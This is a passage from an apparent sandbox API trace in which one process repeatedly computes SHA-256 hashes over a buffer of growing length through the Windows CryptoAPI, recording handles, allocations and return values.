dwParam=0x2, pbData=0x32e673f0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e673f0, pdwDataLen=0xcdfdc) returned 1 [0175.899] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.899] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0175.899] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0175.899] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.899] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0175.899] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.899] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67660 [0175.899] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e67660, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67660, pdwDataLen=0xcdfdc) returned 1 [0175.899] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.899] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0175.899] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0175.900] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.900] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.900] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.900] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66b50 [0175.900] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66b50, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66b50, pdwDataLen=0xcdfdc) returned 1 [0175.900] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.900] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0175.900] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0175.900] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.900] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x120, dwFlags=0x0) returned 1 [0175.900] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.900] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67510 [0175.901] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e67510, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67510, pdwDataLen=0xcdfdc) returned 1 [0175.901] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.901] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0175.901] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0175.901] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.901] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x140, dwFlags=0x0) returned 1 [0175.901] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.901] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66df0 [0175.901] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66df0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66df0, pdwDataLen=0xcdfdc) returned 1 [0175.901] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.901] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0175.901] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0175.902] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.902] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x160, dwFlags=0x0) returned 1 [0175.902] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.902] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e671e0 [0175.902] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e671e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e671e0, pdwDataLen=0xcdfdc) returned 1 [0175.902] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.902] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0175.902] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0175.902] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.902] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x180, dwFlags=0x0) returned 1 [0175.902] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.902] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67420 [0175.902] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e67420, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67420, pdwDataLen=0xcdfdc) returned 1 [0175.903] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0175.903] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0175.903] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.903] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.903] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0175.903] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.903] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66e20 [0175.903] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66e20, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66e20, pdwDataLen=0xcdfdc) returned 1 [0175.903] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.903] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.903] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0175.904] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.904] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0175.904] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.904] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e676c0 [0175.904] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e676c0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e676c0, pdwDataLen=0xcdfdc) returned 1 [0175.904] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.904] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0175.904] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0175.904] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.904] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0175.904] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.904] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66c10 [0175.904] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66c10, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66c10, pdwDataLen=0xcdfdc) returned 1 [0175.904] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.905] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0175.905] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0175.905] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.905] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x200, dwFlags=0x0) returned 1 [0175.905] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.905] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66f10 [0175.905] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e66f10, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66f10, pdwDataLen=0xcdfdc) returned 1 [0175.905] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.905] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0175.905] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338238d0) returned 1 [0175.906] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.906] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x220, dwFlags=0x0) returned 1 [0175.906] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.906] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66ca0 [0175.906] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66ca0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66ca0, pdwDataLen=0xcdfdc) returned 1 [0175.906] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.906] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0175.906] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821dd0) returned 1 [0175.906] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.906] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x240, dwFlags=0x0) returned 1 [0175.906] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.906] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66cd0 [0175.906] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66cd0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66cd0, pdwDataLen=0xcdfdc) returned 1 [0175.906] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.906] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0175.907] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.907] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.907] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x260, dwFlags=0x0) returned 1 [0175.907] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.907] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66d00 [0175.907] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e66d00, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66d00, pdwDataLen=0xcdfdc) returned 1 [0175.907] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.907] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.907] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338229d0) returned 1 [0175.908] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.908] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x280, dwFlags=0x0) returned 1 [0175.908] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e670f0 [0175.908] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e670f0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e670f0, pdwDataLen=0xcdfdc) returned 1 [0175.908] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.908] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0175.908] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0175.908] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.908] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0175.908] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66fd0 [0175.908] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66fd0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66fd0, pdwDataLen=0xcdfdc) returned 1 [0175.908] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.908] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0175.908] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338230d0) returned 1 [0175.909] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.909] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0175.909] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.909] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66d30 [0175.909] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e66d30, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66d30, pdwDataLen=0xcdfdc) returned 1 [0175.909] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.909] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0175.909] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.910] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.910] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0175.910] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.910] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66d60 [0175.910] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e66d60, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66d60, pdwDataLen=0xcdfdc) returned 1 [0175.910] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.910] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.910] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0175.910] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.910] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x300, dwFlags=0x0) returned 1 [0175.910] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.910] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66e50 [0175.910] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66e50, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66e50, pdwDataLen=0xcdfdc) returned 1 [0175.910] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.910] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0175.910] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0175.911] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.911] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x320, dwFlags=0x0) returned 1 [0175.911] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.911] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66e80 [0175.911] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66e80, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66e80, pdwDataLen=0xcdfdc) returned 1 [0175.911] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.911] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0175.911] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0175.912] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.912] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x340, dwFlags=0x0) returned 1 [0175.912] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.912] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67240 [0175.912] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e67240, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67240, pdwDataLen=0xcdfdc) returned 1 [0175.912] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.912] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0175.912] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.912] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.912] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x360, dwFlags=0x0) returned 1 [0175.912] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.912] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67270 [0175.912] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e67270, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e67270, pdwDataLen=0xcdfdc) returned 1 [0175.912] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.912] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.912] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0175.913] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.913] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x380, dwFlags=0x0) returned 1 [0175.913] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.913] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e66eb0 [0175.913] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e66eb0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e66eb0, pdwDataLen=0xcdfdc) returned 1 [0175.913] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.913] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0175.913] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ad0) returned 1 [0175.914] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.914] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0175.914] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.914] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e672a0 [0175.914] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e672a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e672a0, pdwDataLen=0xcdfdc) returned 1 [0175.914] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.914] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0175.914] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0175.914] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.914] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0175.914] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.914] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e672d0 [0175.914] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e672d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e672d0, pdwDataLen=0xcdfdc) returned 1 [0175.914] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.914] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0175.914] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0175.915] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.915] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0175.915] CryptGetHashParam (in: hHash=0x332b7a50, 